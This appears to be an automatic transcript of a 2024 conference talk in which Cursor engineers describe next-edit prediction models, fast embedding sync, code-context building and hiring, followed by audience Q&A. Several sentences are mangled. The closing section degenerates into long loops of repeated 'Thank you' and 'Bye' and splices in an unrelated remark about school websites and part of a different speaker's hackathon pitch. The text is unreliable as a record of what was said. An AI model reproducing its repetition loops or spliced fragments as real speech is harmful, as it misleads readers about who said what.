A lot of tech has been required to kind of do this vertically integrated full-stack AI product. So as Suali mentioned, you know, we've done a lot of work on the next action prediction model that's powering Copilot++. The way that started was, you know, we started by trying out-of-the-box models on this idea of predicting the next action that a user is going to take in a code base.

And the problem was the models weren't that accurate. They were expensive and they were slow. And so we started with, you know, having small curated data sets and doing a parameter efficient fine-tune to, you know, take some of the out-of-the-box models and make them better at this objective. And then we went even further and we started to get the open source models to be, you know, good at this objective.

And now we have very small models that are very, very good at this next edit prediction objective. And we've also spent a bunch of time optimizing the inference for these models too, where when you're rewriting code, often, you know, one thing you waste time on when you're rewriting code is the unchanged parts of the code.

And so there are things you can do in the inference environment to kind of jump over those unchanged pieces. And then you want to talk through some of the other kind of technical points here? One of the things that we found really interesting was every time you would open up a code base for embeddings, for almost everyone, things would be super duper slow.

You know, if you opened up, you know, the SQLite repo or if you opened up a much larger repo like LLVM, you would end up in a in a situation where like LLVM would take hours and hours and hours to upload, which is just kind of unacceptable for us.

So we had to build a very performant, you know, file syncing engine that sort of syncs embeddings across the server. You know, it can generally do something like a thousand files over a few minutes. If you're like Instacart and have like hundreds of thousands of files, it will take like tens of minutes.

But it's not something that would take days. And when you do edits on that code base, our embeddings sync extremely quickly. And that means that your context is almost always very real time. And it's not going to be something where, you know, you check something out and it's like not updated for an hour or so.

The other things we've sort of done that I find most interesting are a lot of model caching tricks that rely on both the, you know, code editing features, you know, rely on how the models sort of relate to each other. So in a general code base, a lot of the files have links that come from, you know, go to definition, links that come from a lot of the semantic features of a language.

And using that to actually build context has been something that's been super useful for us. Yeah, I guess I'll say one last thing about remote performance profiles, which, you know, when you're building an editor, you're not only working on the sort of AI side of things. We found it incredibly important to both make cursor really fast.

And, you know, that's something that both the VS Code team works really hard on. But that's something we've sort of developed our muscle in as well. So if you, you know, hopefully will come work for us, you don't agree not only work on the AI side of things, but also on, you know, building a performance editor that shipped to hundreds of thousands of people, which is just an interesting development problem in and of itself.

Yeah. And maybe just to wrap it up here, you know, as a shameless plug, we're always looking for brilliant people to join us. We're really small talent that's team very in person based in San Francisco. And we're looking for both talented creative people on the design and product side of things and also people all on the other end on the research scientist side of things.

Because as mentioned, we're working on the full stack. We want to build the tool when it comes to, you know, down to the interface and figuring out what programming is going to look like there. And then also working backwards and building the most useful tech for people. And sometimes that requires using the biggest, smartest models.

Sometimes that requires using, you know, models that are really specialized to a particular task are very fast and very cheap. And so, you know, to leave you with this in the next five years, we really believe that it will be possible to build a tool that automates almost all of software engineering as it looks like today and transforms the discipline of programming into one where individual engineers can build systems that are much more complex than even entire engineering teams can build today.

And TBD will be the ones to execute on that opportunity, but that's one that really excites us. And, you know, we wake up every day passionate to try and solve it. So if you want to join us, the best way to reach us is at hiring at AnySphere.Inc. And thank you all for your time and happy to take questions if we have extra time, too.

Mike Beck, thank you. Thanks so much, guys, for going through that. Yeah, we do have, I think, three minutes-ish left for Q&A. Oh, we have one already here in the front. Okay. I just want to, first off, thank you. It's probably been the most productive year writing code in my life in part, in large part, because of Cursor.

For folks who have started playing with it a little bit, maybe use the chat, you know, ask it to write things, paste it in the chat. What are some, like, more advanced techniques of using Cursor that you've discovered beyond the obvious of just, you know, moving code from the chat into the, or using command K, et cetera?

It's been really interesting seeing the different ways that people end up using the tool. I think there are, Cursor is a pretty powerful and full-featured tool at this point, and there are lots of hidden features as you dig more and more into the tool. So, for instance, on the chat side of things, one thing a lot of folks do is these models often output code blocks in chat, and they output, like, kind of shorthand code blocks with dot, dot, dots interspersed, and taking those code blocks, actually putting them and implementing them in your code base can be a bit tedious, and so we have specialty models, for instance, that will apply those code blocks from chat.

I would say kind of the two features we listed today and kind of dive deep into, one of them a lot of people know about, but maybe less than, you know, the entire user base, is command K. And so often that inline code editing is way more ergonomic than going to something like the chat and then, you know, having to apply changes from chat and going back and forth.

There are also some hidden debugging features, too. So, you know, if you get a stack trace in the terminal, we have this kind of a specialty loop to help you debug that. And if you run into really thorny linter errors, we have a way to, you know, to basically debug those, too.

You have to kind of hover over things to discover that. But by and large, right now, the most useful parts of the product are this, you know, next edit prediction with Copilot++, command K for writing code, and then chat for Q&A and asking questions about a code base. Any more questions?

I think we have time for one more. Maybe one and a half. Again, some work on the product. My question is, do you run, like, personalized models? I'm finding more and more that it feels like it knows what I want to do next. Hello. Oh, okay. My mic is enabled.

We've done a ton of work on the context building side of things. So it's not that models are being edited in the weights, per se, but we're using the in-context learning abilities of these models to find the parts of the code base that are most relevant to your task or query.

And that goes into both the next action prediction, next edit prediction side of things, where we're looking at your revision history. We're trying to figure out the next thing you're going to do. So if you're in the middle of a refactor, that model's really good at figuring out, hey, out of the last 200 lines you changed, what were the most important 15 that gives me a sense of your intent?

And ditto for, you know, chatting command K. It's figuring out the parts of the code base, you know, the building blocks that are most relevant for writing the code you wanted to write or answering the question that you have. For the future, one thing I'd like to comment on is sort of a nerd snipe would be two problems we're very interested in in the sort of personalization end of things is one of them is can we run some sort of, you know, agentic loop in the background that's building context for you while you're asking questions.

And then the second problem that we're really interested in, can we make a model learn your code base? So if you have, you know, research ideas for, you know, actually learning a really large code base, in which case you might be sort of start getting inaccurate when you do retrieval and we're super interested in if you have ideas.

Awesome. Well, thank you so much everyone for the time today. We had some incredible speakers here. As mentioned, please do feel free to find them after the fact. Rahul said that he'll be over at the Microsoft booth in the Expo. Kevin will be around here and I think the cursor guys will be around here as well.

Um, thanks again for attending. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. No, I actually already have so many web tools that I have to sign into, some of those apps work better on some machines than others, sometimes there are restrictions on what websites we can and can't visit from within the school, but I can always send an email.

Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Bye. Hey everyone, I'm Aditya Adwani, an AI engineer based in San Francisco.

Along with my teammates, I created Mathmatrix movies at a hackathon in SF on May 11th, 2024. Today, I'd like to show you what our project can do because I think it's really cool. What it does is that it generates really cool math explainer videos in a truly unique style that is able to get concepts across visually.

This is something that I think is really unique that you may never have seen before. So AI hackers. Let's go. Let's go. Let's go. Let's go. Let's go. Let's go. Let's go. Let's go. Let's go. Let's go. Let's go. Let's go. Let's go. Thank you. Thank you. Thank you.

Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.

Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.

AI Engineer World’s Fair 2024 — Keynotes & CodeGen Track

Transcript